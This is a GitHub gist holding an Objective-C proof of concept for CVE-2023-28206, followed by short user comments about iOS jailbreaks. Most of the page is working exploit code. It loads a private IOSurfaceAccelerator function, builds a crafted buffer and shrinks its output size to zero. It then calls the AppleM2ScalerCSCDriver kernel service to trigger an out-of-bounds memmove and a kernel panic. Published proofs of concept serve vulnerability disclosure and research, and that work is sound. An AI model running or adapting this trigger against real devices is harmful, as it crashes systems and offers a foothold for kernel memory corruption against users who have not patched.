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LinusHenze/PoC.m Secret

Last active April 1, 2024 15:47
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A PoC for CVE-2023-28206
// PoC.m
// IOSABugTrigger
// Created by Linus Henze on 2023-04-08.
// Copyright © 2023 Pinauten GmbH. Some rights reserved.
// This is a PoC for CVE-2023-28206, triggering an oob memmove in IosaColorManagerMSR8::getHDRStats_gatedContext
// License: MIT
#import <CoreFoundation/CoreFoundation.h>
#import <Foundation/Foundation.h>
#import <IOSurface/IOSurfaceTypes.h>
#import <IOSurface/IOSurfaceRef.h>
#import <IOKit/IOKitLib.h>
#import <stdio.h>
#import <assert.h>
#import <stdint.h>
#import <dlfcn.h>
struct CommApiData {
uint32_t inType;
void *inBuf;
uint32_t inBufSize;
uint32_t outType;
void *outBuf;
uint32_t outSize;
uint64_t (*prepareTransformBuffersAndOptions)(IOSurfaceRef a, IOSurfaceRef b, CFDictionaryRef dict, bool unk, void *buf);
// This function triggers an oob memmove in IosaColorManagerMSR8::getHDRStats_gatedContext
kern_return_t trigger_memmove_oob_copy(void) {
void *iosaHndl = dlopen("/System/Library/PrivateFrameworks/IOSurfaceAccelerator.framework/IOSurfaceAccelerator", RTLD_NOW);
prepareTransformBuffersAndOptions = dlsym(iosaHndl, "prepareTransformBuffersAndOptions");
NSDictionary *dict = @{
(__bridge NSString*) kIOSurfaceWidth: @1024,
(__bridge NSString*) kIOSurfaceHeight: @1024,
(__bridge NSString*) kIOSurfaceBytesPerElement: @4,
(__bridge NSString*) kIOSurfaceBytesPerRow: @(1024 * 4),
(__bridge NSString*) kIOSurfaceAllocSize: @(1024 * 1024 * 4),
(__bridge NSString*) kIOSurfacePixelFormat: @((uint32_t) 'RGBA'),
@"HDREnable": @YES,
// This is required for some reason
@"HistogramPixelBins": @[
IOSurfaceRef srcSurf = IOSurfaceCreate((__bridge CFDictionaryRef) dict);
memset(IOSurfaceGetBaseAddress(srcSurf), 0xF0, 1024 * 1024 * 4);
IOSurfaceRef destSurf = IOSurfaceCreate((__bridge CFDictionaryRef) dict);
void *dataBuf = malloc(0x170);
memset(dataBuf, 0, 0x170);
uint64_t rr = prepareTransformBuffersAndOptions(srcSurf, destSurf, (__bridge CFDictionaryRef) dict, 0, dataBuf);
struct CommApiData *apiDat = (struct CommApiData*) ((uintptr_t) dataBuf + 0xD0);
// Tell the kernel we want to do some HDR stuff
int i = 0;
uint32_t *pwnData = malloc(0x4000 * 4); // Need to allocate enough space because otherwise...
pwnData[i++] = 2; // Number of properties
pwnData[i++] = 100; // Size of properties
pwnData[i++] = 'base'; // Tag
pwnData[i++] = 4; // Size of data for this tag
pwnData[i++] = 0; // Value
pwnData[i++] = 'basf'; // Tag
pwnData[i++] = 4; // Size of data for this tag
pwnData[i++] = 0; // Value
apiDat[0].inType = 3;
apiDat[0].inBuf = pwnData;
apiDat[0].inBufSize = 0x4000 * 4;
apiDat[0].outType = 2;
apiDat[0].outBuf = malloc(0x4000);
apiDat[0].outSize = 0x1008; // Tell the kernel that we have 0x1008 bytes of space (this is the minimum)...
apiDat[2].inType = 3;
apiDat[2].inBuf = pwnData;
apiDat[2].inBufSize = 0x4000 * 4;
apiDat[2].outType = 2;
apiDat[2].outBuf = malloc(0x4000);
apiDat[2].outSize = 0; // ...and then replace the buffer with one of size zero!
io_service_t service = IOServiceGetMatchingService(kIOMainPortDefault, IOServiceMatching("AppleM2ScalerCSCDriver"));
io_connect_t conn = 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self_, 0, &conn);
assert(kr == KERN_SUCCESS);
kr = IOConnectCallStructMethod(conn, 1, dataBuf, 0x170, NULL, NULL);
// Kernel should have paniced at this point
return kr;
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Arzumify commented Jan 9, 2024

Kfd moment

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App for this?

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App for this?

To build it, you use a wonderful tool known as 'clang'

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yo??? ios 16 jb eta s0n????


Somewhere in April - December
Now none of you go making opa334 leave I swear to the jailbreak gods

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and it happened lol

Dopamine 2 my beloved

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